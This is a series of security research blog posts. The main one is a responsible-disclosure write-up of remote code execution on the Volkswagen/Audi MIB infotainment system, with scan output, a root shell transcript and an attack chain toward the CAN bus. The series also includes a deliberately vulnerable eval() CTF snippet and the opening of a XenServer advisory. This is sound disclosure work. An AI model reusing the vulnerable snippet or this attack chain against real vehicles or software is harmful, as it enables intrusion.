Users that are unable to update, can mitigate the issues by not using the < or < validation options and not use the IOS XR driver.

Resolution

Users can update to version 0.24.3 of napalm-base and 0.5.3 of napalm-iosxr, which fixes these vulnerabilities.

Challenge

We have taken the liberty to transform this vulnerability into a CTF challenge for SHA2017. Exploitation is left as an exercise for the reader:

#!/usr/bin/env python2

eval(raw_input().title())

Conclusion

The NAPALM project assumes that all nodes are playing nice. However, this assumption does not hold in a situation where a node is compromised. The project would benefit from a more defensive programming style, were values that are returned from a node are considered hostile and addressed accordingly.

We would like to thank the developers of NAPALM for their quick response. The mentioned vulnerabilities were fixed within 2 hours after our initial email!

Timeline

2017-07-12 First contact with NAPALM developers
2017-07-12 NAPALM released a fix

Volkswagen Auto Group MIB infotainment system - unauthenticated remote code execution as root

19 July 2018 at 00:00

Introduction

Our world is becoming more and more digital, and the devices we use daily are becoming connected more and more. Thinking of IoT products in domotics and healthcare, it’s easy to find countless examples of how this interconnectedness improves our quality of life.

However, these rapid changes also pose risks. In the big rush forward, we as a society aren’t always too concerned with these risks until they manifest themselves. This is where the hacker community has taken an important role in the past decades: using curiosity and skills to demonstrate that the changes in the name of progress sometimes have a downside that we need to consider.

At Computest, our mission is to improve the quality of the software that surrounds us. While we normally do so through services and consulting to our customers, R&D projects play an important role as well. In 2017 we put significant R&D effort in vehicle security. We chose this topic for a number of reasons, besides it being an interesting topic from a technical point of view. For one because we saw more and more cars in our car park with internet connectivity, often without a convenient mechanism to receive or apply security updates. This ecosystem reminded us of other IoT systems, where we face similar problems concerning remote maintenance. We were interested to see how these effect the current state of security in the automotive vehicle industry. We also felt that this research topic would not only be of interest to us, but would also make the world a little bit safer in an industry that effects us all. Lastly this topic would of course allow us to demonstrate our expertise in the field. This post describes our research approach, the research itself and its findings, the disclosure process with the manufacturer and finally our conclusions.

We are not the first to investigate the current state of security in automotive vehicles, the research of Charlie Miller and Chris Valasek being the most prominent example. They found that the IVI (In-Vehicle Infotainment) system in their car suffered from a trivial vulnerability, which could be reached via the cellular connection because it was unfirewalled. We wanted to see if anything had changed since then, or if the same attack strategy might also succeed to other cars as well.

For this research, we looked at different cars from different models and brands, with the similarity that all cars had internet connectivity. In the end, we focused our research on one specific in-vehicle infotainment (IVI) system, that is used in most cars from the Volkswagen Auto Group and often referred to as MIB. More specifically, in our research we used a Volkswagen Golf GTE and an Audi A3 e-tron.

At Computest we believe in public disclosure of identified vulnerabilities as users should be aware of the risks related to use a specific product or service. But at all times we also consider it our responsibility that nobody is put at unnecessary risk and also no unnecessary damage is caused by such a disclosure.

The vulnerabilities we identified are all software-based, and therefore could be mitigated via a firmware upgrade. However, this cannot be done remotely, but must be done by an official dealer which makes upgrading the entire fleet at once difficult.

Based on above we decided to not provide a full disclosure of our findings in this post. We describe the process we followed, our attack strategy and the system internals, but not the full details on the remote exploitable vulnerability as we would consider that being irresponsible. This might disappoint some readers, but we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

This is also why we first informed the manufacturer about the vulnerability and disclosed all our findings to them, gave them the chance to review this research post and also provide a related statement which we would incorporate into this document. We have received feedback on the research post beginning of February 2018. Prior to release of this research post, Volkswagen sent us the letter that is attached to this post confirming the vulnerabilities. In this letter they also state that the vulnerabilities have been fixed in an update to the infotainment system, which means that new cars produced since the update are not affected by the vulnerabilities we found.

Car anatomy

A modern-day vehicle is much more connected than meets the eye. In the old days, cars were mostly mechanical vehicles that relied on mechanics for functionality like steering and braking to operate. Modern vehicles mostly rely on electronics to control these systems. This is often referred to by drive by wire, and has several advantages over the traditional mechanical approach. Several safety features are possible because components are computer controlled. For example, some cars can and will brake automatically if the front radar detects an obstacle ahead and thinks collision is inevitable. Drive by wire is also used for some luxury functionalities such as automatic parking, by electronically taking over the steering wheel based on radar/camera footage.

All these new functionalities are possible because every component in a modern car is hooked up to a central bus, which is used by components to exchanges messages. The most common bus system is the CAN (Control Area Network) bus, which is present in all cars built since the nineties. Nowadays it controls everything, from steering to unlocking the doors to the volume knob on the radio.

The CAN protocol itself is relatively straight forward. In basis, each message has an arbitration ID and a payload. There is no authentication, authorization, signing, encryption etc. Once you are on the bus you can send arbitrary messages, which will be received by all parties connected to the same bus. There is also no sender or recipient information, each component can decide for itself if a specific message does apply to them.

In theory, this means that if an attacker would gain access to the CAN bus of a vehicle, he or she would control the car. They could impersonate the front radar for example to instruct the braking system to make an emergency stop due to a near collision or take over the steering. The attacker only needs to find a way to actually get access to a component that is connected to the CAN bus, without physical access.

The attacker has a lot of remote attack surface to choose from. Some of them require close proximity to the car, while others are reachable from anywhere around the globe. Some of the vectors will require user interaction, whereas others can be attacked unknowingly to its passengers.

For example, modern cars have a system for monitoring tire pressure, called TPMS (Tire Pressure Monitoring System), which will notify the driver if one of the tiers has a low pressure. This is a wireless system, where the tire will communicate its active pressure either via radio signals or Bluetooth to a receiver inside the car. This receiver will, in turn, notify other components via a message on the CAN bus. The instrument cluster will receive this message and as a response turn on the appropriate warning light. Another example is the key fob that will communicate wirelessly with a receiver in your car, which in its turn will communicate with the locks in the door and with the immobilizer in the engine. All these components have two things in common: they are connected to the CAN bus, and have remote attack surface (namely the receiver).

Modern cars have two main ways of protection against malicious CAN messages. The first is the defensive behavior of all components in a car. Each component is designed to always choose the safest option, in order to protect against components that might be malfunctioning. For example, automatic steering for automatic parking might be disabled by default, only to be enabled when the car is in reverse and at a low speed. And if another, malicious, device on the bus impersonates the front-radar to try to trigger an emergency stop, the real front-radar will continue to spam the bus with messages that the road is clear.

The second protection mechanism is that a modern car has more than one CAN bus, separating safety critical devices from convenience devices. The brakes and engine for example are connected to a high-speed CAN bus, while the air conditioning and windscreen wipers are connected to a separated (and most likely low-speed) CAN bus. In theory these busses should be completely separated, in practice however they are often connected via a so-called gateway. This is because there are circumstances were data must flow from the low-speed to the high-speed CAN bus and vice-versa. For example, the door locks must be able to communicate to the engine to enable and disable the immobilizer, and the IVI system receives status information and error codes from the engine to show on the central display. Firewalling these messages is the responsibility of the gateway, it will monitor every message from every bus and decides which messages are allowed to pass through.

In the last few years we have seen an increase in cars that feature an internet connection, we even have seen cars that have two cellular connections at once. This connection can for example be used by the IVI system to obtain information, such as maps data, or to offer functionalities like an internet browser or a Wi-Fi hotspot or to give owners the ability to control some features via a mobile app. For example, to remotely start the central heating to preheat the car, or by being able to remotely lock/unlock your car. In all situations, the device that has the cellular connection is also hooked up to the CAN bus, which makes it theoretically possible to remotely compromise a vehicle.

This attack vector is not just theory, there have been researchers in the past that succeeded in this goal. Some of these attacks were possible because the cellular connection was not firewalled and had a vulnerable service listening, others relied on the fact that the user would visit an attacker-controlled webpage on the in-car browser and exploited a vulnerability in the rendering engine.

Research goal

A modern car has many remote vectors, such as Bluetooth, TPMS and the key fob. But most vectors require that the attacker is in close proximity to the victim. However, for this research we specifically focused on attack vectors that could be triggered via the internet and without user interaction. Once we would have found such a vector, our goal was to see if we could use this vector to influence either driving behavior or other critical safety components in the car. In general, this would mean that we wanted to gain access to the high-speed CAN bus, which connects components like the brakes, steering wheel and the engine.

We chose the internet vector above others, because such an attack would further illustrate our point of the risks that are involved with the current eco-system. All other vectors require being physically close to the car, making the impact typically limited to only a handful of cars at a time.

We formulated the following research question: “Can we influence the driving behavior or critical security systems of a car via an internet attack vector?”.

Research approach

We started this research with nine different models, from nine different brands. These were all lease cars belonging to employees of Computest. Since we are not the actual owner of the car we asked permission for conducting this research beforehand from both our lease company and the employee driving the car.

We conducted a preliminary research in which we mapped the possible attack vectors of each car. Determining the attack vectors was done by looking at the architecture, reading public documentation and by a short technical review.

Things we were specify searching for:

  • cars with only a single or few layers between the cellular connection and the high-speed CAN bus;
  • cars which allowed us to easily swap SIM cards (since we are not the owner of the cars, soldering, decapping etc. is undesirable);
  • cars that offered a lot of services over cellular or Wi-Fi.

From here we choose the car which we thought would give us the highest chance of success. This is of course subjective and does not guarantee success. For some models getting initial access might be easier than others, but this does say nothing about the effort required for lateral movement.

We finally settled for the Volkswagen Golf GTE as our primary target. We later added the Audi A3 e-tron to our research. Both vehicles share the same IVI-system which, on first sight, seemed to have a broad attack surface, increasing the chance of finding an exploitable vulnerability.

Research findings

Initial access

We started our research initially with a Volkswagen Golf GTE, from 2015, with the Car-Net app. This car has a IVI system manufactured by Harman, referred to as the modular infotainment platform (MIB). Our model was equipped with the newer version (version 2) of this platform, which had several improvements from the previous version (such as Apple CarPlay). Important to note is that our model did not have a separate SIM card tray. We assumed that the cellular connection used an embedded SIM, inside the IVI system, but this assumption would later turn out to be invalid.

The MIB version installed in the Volkswagen Golf has the possibility to connect to a Wi-Fi network. A quick port scan on this port shows that there are many services listening:

$ nmap -sV -vvv -oA gte -Pn -p- 192.168.88.253
Starting Nmap 7.31 ( https://nmap.org ) at 2017-01-05 10:34 CET
Host is up, received user-set (0.0061s latency).
Not shown: 65522 closed ports
Reason: 65522 conn-refused
PORT      STATE    SERVICE         REASON      VERSION
23/tcp    open     telnet          syn-ack     Openwall GNU/*/Linux telnetd
10123/tcp open     unknown         syn-ack
15001/tcp open     unknown         syn-ack
21002/tcp open     unknown         syn-ack
21200/tcp open     unknown         syn-ack
22111/tcp open     tcpwrapped      syn-ack
22222/tcp open     easyengine?     syn-ack
23100/tcp open     unknown         syn-ack
23101/tcp open     unknown         syn-ack
25010/tcp open     unknown         syn-ack
30001/tcp open     pago-services1? syn-ack
32111/tcp open     unknown         syn-ack
49152/tcp open     unknown         syn-ack

Nmap done: 1 IP address (1 host up) scanned in 259.12 seconds

There is a fully functional telnet service listening, but without valid credentials, this seemed like a dead end. An initial scan did not return any valid credentials, and as it later turned out they use passwords of eight random characters. Some of the other ports seemed to be used for sending debug information to the client, like the current radio station and current GPS coordinates. Port 49152 has a UPnP service listening and after some research it was clear that they use PlutinoSoft Platinum UPnP, which is open source. This service piqued our interest because this exact service was also found on the Audi A3 (also from 2015). This car however had only two open ports:

$ nmap -p- -sV -vvv -oA a3 -Pn 192.168.1.1
Starting Nmap 7.31 ( https://nmap.org ) at 2017-01-04 11:09 CET
Nmap scan report for 192.168.1.1
Host is up, received user-set (0.013s latency).
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT      STATE  SERVICE REASON       VERSION
53/tcp    open   domain  syn-ack      dnsmasq 2.66
49152/tcp open   unknown syn-ack

Nmap done: 1 IP address (1 host up) scanned in 235.22 seconds

We spent some time reviewing the UPnP source code (but by no means was this a full audit) but didn’t find an exploitable vulnerability.

We initially picked the Golf as primary target because it had more attack surface, but this at least showed that the two systems were built upon the same platform.

After further research, we found a service on the Golf with an exploitable vulnerability. Initially we could use this vulnerability to read arbitrary files from disk, but quickly could expand our possibilities into full remote code execution. This attack only worked via the Wi-Fi hotspot, so the impact was limited. You have to be near the car and it must connect with the Wi-Fi network of the attacker. But we did have initial access:

$ ./exploit 192.168.88.253
[+] going to exploit 192.168.88.253
[+] system seems vulnerable...
[+] enjoy your shell:
uname -a
QNX mmx 6.5.0 2014/12/18-14:41:09EST nVidia_Tegra2(T30)_Boards armle

Because there is no mechanism to update this type of IVI remotely, we made the decision not to disclose the exact vulnerability we used to gain initial access. We think that giving full disclosure could put people at risk, while not adding much to this post.

MMX

The system we had access to identified itself as MMX. It runs on the ARMv7a architecture and uses the QNX operating system, version 6.5.0. It is the main processor in the MIB system and is responsible for things like screen compositing, multimedia decoding, satnav etc.

We noticed that the MMX unit was responsible for the Wi-Fi hotspot functionality, but not for the cellular connection that was used for the Car-Net app. However, we did find an internal network. Finding out what was on the other end was the next step in our research.

# ifconfig mmx0
mmx0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
 address: 00:05:04:03:02:01
 media: <unknown type> autoselect
 inet 10.0.0.15 netmask 0xffffff00 broadcast 10.0.0.255
 inet6 fe80::205:4ff:fe03:201%mmx0 prefixlen 64 scopeid 0x3

One of the problems we faced was the lack of tools on the system and the lack of a build chain to compile our own. For example, we couldn’t get a socket or process list due this. The QNX operating system and build-chain is commercial software, for which we didn’t have a license. At first, we tried to work with the tools that were already present. For example, we relied on a broadcast ping for host discovery, and used the included ftp client for a portscan (which took ages). While cumbersome, we found one other host alive on this network. Eventually we applied for a trial version of QNX. Not expecting much of this we continued our research. But, after a few weeks our application got through, and we received a demo license. Which meant we had access to standard tools like telnet and ps, as well as a build chain.

The device on the other end identified itself as RCC, and also had a telnet service running. We tried logging in using the same credentials, but this initially failed. After further investigating MMX’s configuration it became apparent that MMX and RCC share their filesystems, using Qnet; a QNX proprietary protocol. MMX and RCC are allowed to spawn processes on each other and read files (such as the shadow file). It even turned out that the shadow file on RCC was just a symlink to the shadow file on MMX. It seemed that the original telnet binary did not fully function, causing the password reject message. After some rewriting everything worked as expected.

# /tmp/telnet 10.0.0.16
Trying 10.0.0.16...
Connected to 10.0.0.16.
Escape character is '^]'.


QNX Neutrino (rcc) (ttyp0)

login: root
Password:

     ___           _ _   __  __ ___ _____
    /   |_   _  __| (_) |  \/  |_ _|  _  \
   / /| | | | |/ _  | | | |\/| || || |_)_/
  / __  | |_| | (_| | | | |  | || || |_) \
 /_/  |_|__,__|\__,_|_| |_|  |_|___|_____/

/ > ls –la
total 37812
lrwxrwxrwx  1 root      root             17 Jan 01 00:49 HBpersistence -> /mnt/efs-persist/
drwxrwxrwx  2 root      root             30 Jan 01 00:00 bin
lrwxrwxrwx  1 root      root             29 Jan 01 00:49 config -> /mnt/ifs-root/usr/apps/config
drwxrwxrwx  2 root      root             10 Feb 16  2015 dev
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 eso
drwxrwxrwx  2 root      root             10 Jan 01 00:00 etc
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 hbsystem
lrwxrwxrwx  1 root      root             20 Jan 01 00:49 irc -> /mnt/efs-persist/irc
drwxrwxrwx  2 root      root             20 Jan 01 00:00 lib
drwxrwxrwx  2 root      root             10 Feb 16  2015 mnt
dr-xr-xr-x  1 root      root              0 Jan 01 00:37 net
drwxrwxrwx  2 root      root             10 Jan 01 00:00 opt
dr-xr-xr-x  2 root      root       19353600 Jan 01 00:49 proc
drwxrwxrwx  2 root      root             10 Jan 01 00:00 sbin
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 scripts
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 srv
lrwxrwxrwx  1 root      root             10 Feb 16  2015 tmp -> /dev/shmem
drwxr-xr-x  2 root      root             10 Jan 01 00:00 usr
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 var
/ >

RCC

The RCC unit is a separate chip on the MIB system. The MIB IVI is a modular platform, were they separated all the multimedia handling from the low-level functions. The MMX (multimedia applications unit) processor is responsible for things like the satnav, screen and input control, multimedia handling etc. While the RCC (radio and car control unit) processor handles the low-level communication.

RCC runs on the same version of QNX. It has even fewer tools available, and only a few hundred kilobytes of ram. But because of the Qnet protocol it is possible to run all tools from the MMX unit on RCC.

Communication with the lower level components, like DAB+, CAN, AM/FM decoding etc. are handled via serial connections; either SPI or I2C. The various configuration options can be found under /etc/.

Car-Net

We expected to find a cellular connection on RCC, but we did not. After further research it turned out that the Car-Net functionality is offered by a completely separate unit, and not the IVI. The cellular connection in the Golf is connected to a box which is located behind the instrument cluster, as is shown below.

The Car-Net box uses an embedded SIM card. Since this box offered no other interface options, and we couldn’t make any physical changes to the car (to see if JTAG was available for example), we did not investigate any further.

Audi A3

From here we decided to put our effort back into the Audi A3. It uses the same IVI system, but used a higher-end version. This version has a physical SIM card, which is used by the Audi connect service. We of course already did a port scan via the Wi-Fi hotspot, which turned out empty, but it might be that the results would be different via the cellular connection.

To test this, we needed to be able to do a port scan on the remote interface. This can either be done if the ISP assigns a public routable IPv4 address (unfirewalled), allows client-to-client communication or by using a hacked femtocell. We chose the first option by using a functionality offered by one of the largest ISPs in the Netherlands. They will assign a public IPv4 address if you change certain APN settings. A portscan on this public IP address gave completely different results than our earlier portscan on the Wi-Fi interface:

$ nmap -p0- -oA md -Pn -vvv -A 89.200.70.122
Starting Nmap 7.31 ( https://nmap.org ) at 2017-04-03 09:14:54 CET
Host is up, received user-set (0.033s latency).
Not shown: 65517 closed ports
Reason: 65517 conn-refused
PORT      STATE    SERVICE    REASON      VERSION
23/tcp    open     telnet     syn-ack     Openwall GNU/*/Linux telnetd
10023/tcp open     unknown    syn-ack
10123/tcp open     unknown    syn-ack
15298/tcp filtered unknown    no-response
21002/tcp open     unknown    syn-ack
22110/tcp open     unknown    syn-ack
22111/tcp open     tcpwrapped syn-ack
23000/tcp open     tcpwrapped syn-ack
23059/tcp open     unknown    syn-ack
32111/tcp open     tcpwrapped syn-ack
35334/tcp filtered unknown    no-response
38222/tcp filtered unknown    no-response
49152/tcp open     unknown    syn-ack
49329/tcp filtered unknown    no-response
62694/tcp filtered unknown    no-response
65389/tcp open     tcpwrapped syn-ack
65470/tcp open     tcpwrapped syn-ack
65518/tcp open     unknown    syn-ack

Nmap done: 1 IP address (1 host up) scanned in 464 seconds

Most services are the same as those on the Golf. Some things may differ (like port numbers), possibly because the Audi has the older model of the MIB IVI system. But, more importantly: our vulnerable service is also reachable, and suffers from the same vulnerability!

An attacker can only abuse this vulnerability if the owner has the Audi connect service, and the ISP in the country of the owner allows client-to-client communication, or hands out public IPv4 addresses.

To summarize our research up to this point: we have remote code execution, via the internet, on MMX. From here we can control RCC as well. The next step would be to send arbitrary CAN messages over the bus to see if we can reach any safety critical components.

Renesas V850

The RCC unit is not directly connected to the CAN bus, it has a serial connection (SPI) to a separate chip that handles all CAN communication. This chip is manufactured by Renesas and uses the V850 architecture.

The firmware on this chip doesn’t allow for arbitrary CAN messages to be sent. It has an API that allows a select number of messages to be sent. Most likely, any vulnerabilities in the gateway would require us to send a message that is not on the list, meaning we need a way to let the Renesas chip send us arbitrary messages. The read functionality on the Renesas chip has been disabled, meaning that it is not possible to extract the firmware from the chip easily.

The MIB system does have a software update feature. For this an SD-card, USB stick or CD must be inserted which holds the new firmware. The update sequence is initiated by the MMX unit, which is responsible for the mounting and handling all removable media. When a new firmware image is found, the update sequence will commence.

The update is signed using RSA, but not encrypted. Signature validation is done by the MMX unit, which will then hand over the appropriate update files for RCC and the Renesas chip. The RCC and Renesas chip will trust that the MMX unit already has performed signature validation, and will thus not revalidate the signature for their new firmware. Updating the Renesas V850 chip can be initiated by the RCC unit (using mib2_ioc_flash).

Firmware images are hard to come by. They are only available for official dealers and not for end-users. However, if one can get a hold of the firmware image, it is theoretically possible to backdoor the original firmware image for the Renesas chip, to allow sending arbitrary CAN messages, and flash this new firmware from the RCC unit.

The figure below shows the attack chain up until this point:

Gateway

By backdooring the Renesas chip we are able to send arbitrary CAN messages on the CAN bus. However, the CAN bus we are connected to is dedicated to the IVI system. It is directly connected to a CAN gateway; a physical device used to firewall/filter CAN messages between the different CAN busses.

The gateway is located behind the steering column and is connected with a single connector which has all the different busses connected.

The firmware for the gateway is signed, so backdooring this chip won’t work as it will invalidate the signature. Furthermore, reflashing the firmware is only possible from the debug bus (ODB-II port) and not from the IVI CAN bus. If we want to bypass this chip we need to find an exploitable vulnerability in the firmware. Our first step to achieve this would be to try to extract the firmware from the chip using a physical vector. However, after careful consideration we decided to discontinue our research at this point, since this would potentially compromise intellectual property of the manufacturer and potentially break the law.

USB vector

After finding the remote vector, we discovered a second vector we had not yet explored. For debugging purposes, the MMX unit recognizes a few USB-to-Ethernet dongles as debug interfaces, which will create an extra networking interface. It seems that this network interface will also serve the vulnerable service. The configuration can be found under /etc/usblauncher.lua:

-- D-Link DUB-E100 USB Dongles
device(0x2001, 0x3c05) {
    driver"/etc/scripts/extnet.sh -oname=en,lan=0,busnum=$(busno),devnum=$(devno),phy_88772=0,phy_check,wait=60,speed=100,duplex=1,ign_remove,path=$(USB_PATH) /lib/dll/devnp-asix.so /dev/io-net/en0";
    removal"ifconfig en0 destroy";
};

device(0x2001, 0x1a02) {
    driver"/etc/scripts/extnet.sh -oname=en,lan=0,busnum=$(busno),devnum=$(devno),phy_88772=0,phy_check,wait=60,speed=100,duplex=1,ign_remove,path=$(USB_PATH) /lib/dll/devnp-asix.so /dev/io-net/en0";
    removal"ifconfig en0 destroy";
};

-- SMSC9500
device(0x0424, 0x9500) {
    -- the extnet.sh script does an exec dhcp.client at the bottom, then usblauncher can slay the dhcp.client when the dongle is removed
    driver"/etc/scripts/extnet.sh -olan=0,busnum=$(busno),devnum=$(devno),path=$(USB_PATH) /lib/dll/devn-smsc9500.so /dev/io-net/en0";
    removal"ifconfig en0 destroy";
};

-- Germaneers LAN9514
device(0x2721, 0xec00) {
        -- the extnet.sh script does an exec dhcp.client at the bottom, then usblauncher can slay the dhcp.client when the dongle is removed
        driver"/etc/scripts/extnet.sh -olan=0,busnum=$(busno),devnum=$(devno),path=$(USB_PATH) /lib/dll/devn-smsc9500.so /dev/io-net/en0";
        removal"ifconfig en0 destroy";
};

But even without this service, telnet is also enabled. The version of QNX that is being used only supports descrypt() for password hashing, which has an upper limit of eight characters. One could use a service like crack.sh which can search the entire key space in less than three days using FPGA’s, for only $ 100,-. We found out that the passwords are changed between models/versions; but we think it is doable, both in time and money, to build a dictionary containing all passwords of all different versions of the MIB IVI.

This vector seems to work on all models that use the MIB IVI system, regardless of the version. Since VAG has multiple car brands, components like the IVI are often reused between brands. This vector will therefore most likely also work on cars from, for example, Seat and Skoda.

We tested this vector by changing some kernel parameters on a Nexus 5 phone. This can be done without the need for reflashing, only root privileges are required. After plugging in the phone, it will be recognized as an Ethernet dongle, and the MMX unit will initialize a debug interface.

Disclosure process

At Computest we believe in public disclosure of identified vulnerabilities as users should be aware of the risks related to use a specific product or service. But at all times we also consider it our responsibility that nobody is put at unnecessary risk and also no unnecessary damage is caused by such a disclosure. That means we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

As recommended we decided to contact the manufacturer as soon as we had verified and documented our findings. To do so we were looking for a specific Responsible Disclosure Policy (RDP) on the website of the manufacturer to understand how such a disclosure should be handled from their point of view.

As Volkswagen apparently did not have such a RDP in place, we followed the public Whistleblower System of Volkswagen and contacted the mentioned external lawyer they listed. Opposite to a typical whistleblower disclosure we had no interest nor reason to stay anonymous and disclosed our identity from the very beginning.

With the help of the external lawyer we got in contact with the quality assurance department of the Volkswagen Group mid of July 2017. After some initial conference calls we decided together that a face-to-face meeting would be the best format to disclose our findings and Volkswagen invited us to visit their IT center in Wolfsburg which we followed end of August 2017.

Obviously, Volkswagen required some time to investigate the impact and to perform a risks assessment. At the end of October we received their final conclusion, that they were not going to publish a public statement themselves. But were willing to review our research post to check whether we have stated the facts correctly and we have received the review at the beginning of February 2018. In April 2018, just prior to release of this post, Volkswagen provided us with a letter that confirms the vulnerabilities, and mentions that they have been fixed in a software update to the infotainment system. This means that cars produced since this update are not affected by the vulnerabilities we found. The letter is attached to this report. But based on our experience, it seems that cars which have been produced before are not automatically updated when being serviced at a dealer, thus are still vulnerable to the described attack

When writing this post, we decided to not provide a full disclosure of our findings. We describe the process we followed, our attack strategy and the system internals, but not the full details on the remote exploitable vulnerability as we would consider that being irresponsible. This might disappoint some readers, but we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

In addition to the above we would like to mention that we have consulted an experienced legal advisor early on in this project to make sure our approach and actions are reasonable, and to assess potential (legal) consequences.

Future work

The current chain of attack only allows for the sending and receiving of CAN messages on an isolated CAN bus. As this bus is strictly separated from the high-speed CAN bus via a gateway, the current attack vector poses no direct threat to driver safety.

However, if an exploitable vulnerability in the gateway were to be found, the impact would significantly increase. Future research could focus on the security of the gateway, to see if there is any way to either bypass or compromise this device. There are still some attack vectors on the gateway that are definitely worth exploring. However, this should only be explored in cooperation with the manufacturer.

We are also looking into extending our research to other cars. We still have some interesting leads from our preliminary research that we could follow.

Conclusions

Internet-connected cars are rapidly becoming the norm. As with many other developments, it’s a good idea to sometimes take a step back and evaluate the risks of the path we’ve taken, and whether course adjustments are needed. That’s why we decided to pay attention to the risks related to internet-connected cars. We set out to find a remotely exploitable vulnerability, which required no user interaction, in a modern-day vehicle and from there influence either driving behavior or a safety feature.

With our research, we have shown that at least the first is possible. We can remotely compromise the MIB IVI system and from there send arbitrary CAN messages on the IVI CAN bus. As a result, we can control the central screen, speakers and microphone. This is a level of access that no attacker should be able to achieve. However, it does not directly affect driving behavior or any safety system due to the CAN gateway. The gateway is specifically designed to firewall CAN messages and the bus the IVI is connected to is separated from all other components. Further research on the security of the gateway was consciously not pursued.

We argue that the threat of an adversary with malicious intent was long underestimated. The vulnerability we initially identified should have been found during a proper security test. During our meeting with Volkswagen, we had the impression that the reported vulnerability and especially our approach was still unknown. We understood in our meeting with Volkwagen that, despite it being used in tens of millions of vehicles world-wide, this specific IVI system did not undergo a formal security test and the vulnerability was still unknown to them. However, in their feedback for this post Volkswagen stated that they already knew about this vulnerability.

Speaking with people within the industry we are under the impression that attention on security and awareness is growing, but with the efforts mainly focusing on the models still in development. Component manufactures producing critical components such as brakes, already had security high up in their quality assurance agenda. This focus was not because of the fear of adversaries on the CAN bus, but mainly to protect against component malfunction, which could otherwise result in situations like unintended acceleration.

A remote adversary is new territory for most industrial component manufacturers, which, to be mitigated effectively, requires embedding security in the software development lifecycle. This is a movement that was started years ago in the AppSec world. This is easier in an environment with automatic testing, continuous deployment and possibility to quickly apply updates after release. This is not always possible in the hardware industry, due to local regulations and the ecosystem. It often requires coordination between many vendors. But, if we want to protect future cars, these are problems we have to solve.

However, what about the cars of today, or cars that were shipped last week? They often don’t have the required capabilities (such as over-the-air updates) but will be on our roads for the next fifteen years. We believe they currently pose the real threat to their owners, having drive by wire technology in cars that are internet-connected without any way to reliably update the entire fleet at once.

We believe that the car industry in general, since it isn’t traditionally a software engineering industry, needs to look to other industries and borrow security principles and practices. Looking at mobile phones for instance, the car industry can take valuable lessons regarding trusted execution, isolation and creating an ecosystem for rapid security patching. For instance, components in a car that are remotely accessible, should be able to receive and apply verified security updates without user interaction.

We understand that component malfunction is a higher threat in day-to-day operation. We also understand that having an internet-connected car has its advantages, and we also not trying to reverse this trend. However, we can’t ignore the threats accompanied with today’s internet-connected world.

Recommendations

Based on our findings documented in this research post and our overall experience in IoT security we would like to conclude this post with some recommendations to manufacturers, consumers and ethical hackers.

Recommendations for manufacturers

  • The growing number of connected consumer devices is not only providing tremendous opportunities, but also comes along with additional risks which need to be taken care of. The quality of produced goods is not only about mechanical functionality and quality of materials used, but the quality and security of the embedded software is equally important and therefore requires equal attention in terms of quality assurance.
  • It is common practice, especially in the field of electronics, to purchase components from a third party. That does not clear the manufacturer from the responsibility for their quality and security; these components need to be included in thorough quality assurance. The company selling the completed product should be prepared to take responsibility for its security and quality.
  • Even the best quality control cannot prevent mistakes from being made. In such an event, manufacturers should stand to their responsibility and communicate swiftly and with transparency to affected customers. Hiding cannot only lead to damages on the customer side, but can also have a very negative impact on the manufacturers reputation.
  • Ethical hackers should not be considered as a threat, but as a help to identify existing vulnerabilities. These people often have different views and approaches, enabling them to find vulnerabilities which otherwise would remain undiscovered. Such identified vulnerabilities are important to improve the product quality.
  • Every manufacturer should have a Responsible Disclosure Policy (RDP) stating clearly how external people can report discovered vulnerability in a safe environment. Ethical hackers should not be threatened but encouraged to disclose findings to the manufacturer. See also ‘NCSC Leidraad Responsible Disclosure’ .

Recommendations for consumers

  • Having an internet-connected car brings a number of advantages mostly for consumers. But be aware that this applied technology is still early in its lifecycle and therefore not fully mature yet in terms of quality and security.
  • This can be associated with the possibility to relatively easy get remote access to your car. Although it is very unlikely that this can impact driving behaviour, it might provide access to personal data stored in the car entertainment system and/or your smart phone.
  • Become informed: ask about quality and security standards of car you are looking into as much as you do that for aspects like crash tests. Specifically ask about the remote maintenance possibilities and how long the manufacturer would maintain the software used in the car (support period). If you want to protect yourself against remote threats, please ask your dealer to install updates during their normal service schedule
  • Keep the software in your car up to date where you have the possibility.
  • This does not only apply to cars, but to all IoT devices such as baby monitors, smart TV’s and home automation.

Recommendations for ethical hackers

  • Identifying and disclosing a vulnerability is not about a personal victory or trophy for the hacker, but a responsibility to contribute to safer and better IT systems.
  • In case you have identified a vulnerability, don’t go further than necessary and make sure you don’t harm anybody.
  • Inform the owner / manufacturer of the identified vulnerability first immediately and do not share related information with the press or any other third party. Look for a responsible disclosure policy (RDP) on the website of the manufacturer and follow the policy. In case you can’t find such a RDP, contact the manufacturer (anonymously) and ask for such a policy to help protect your integrity. A good alternative way is to look for a whistle-blower policy and contact the manufacturer this way.
  • Beware that what may look like a simple fix from your perspective as an engineer, can be something completely different in a manufacturing world when applied to the scale of hundreds of thousands of vehicles. Have some patience and empathy for the situation you’re putting the manufacturer in, even though you may be right to do so.
  • It is important to understand the legal regulations relevant for potential research and investigation activities. Different national legislations and limited relevant jurisdiction does not make that easy. Keep in mind: having no criminal intention does not give a free ride to break the law. In case of doubt seek legal advice upfront!

Letter from Volkswagen

Below the letter from Volkswagen we received on April 17 2018. The letter is from the department we have been in contact with from the start of the disclosure process

XenServer - path traversal leading to authentication bypass

14 August 2018 at 00:00

During a brief code review of XenServer, Computest found and exploited a vulnerability in the XAPI management service that allows an attacker to bypass authentication and remotely perform arbitrary XAPI calls with administrative privileges.

This vulnerability can be further exploited to execute arbitrary shell commands as the operating system “root” user on the Dom0 virtual machine. The Dom0 is the component that manages the hypervisor, and has full control over all the virtual machines as well as the network and storage resources attached to the system.

To exploit this vulnerability an attacker has to be on a network that can reach one of the IPs and ports the XAPI service is available on (port numbers are 80 and 443 by default). Alternatively they can perform the attack through the browser of a user who has access to this port, via either a DNS rebinding attack or possibly by using the primary vulnerability to mount a cross-site scripting attack by using it to read a logfile containing attacker-controlled HTML.

This was not a full audit and further issues may or may not be present.

About XenServer and XAPI

About XenServer:

XenServer is the leading open source virtualization platform, powered by the Xen Project hypervisor and the XAPI toolstack. It is used in the world’s largest clouds and enterprises.

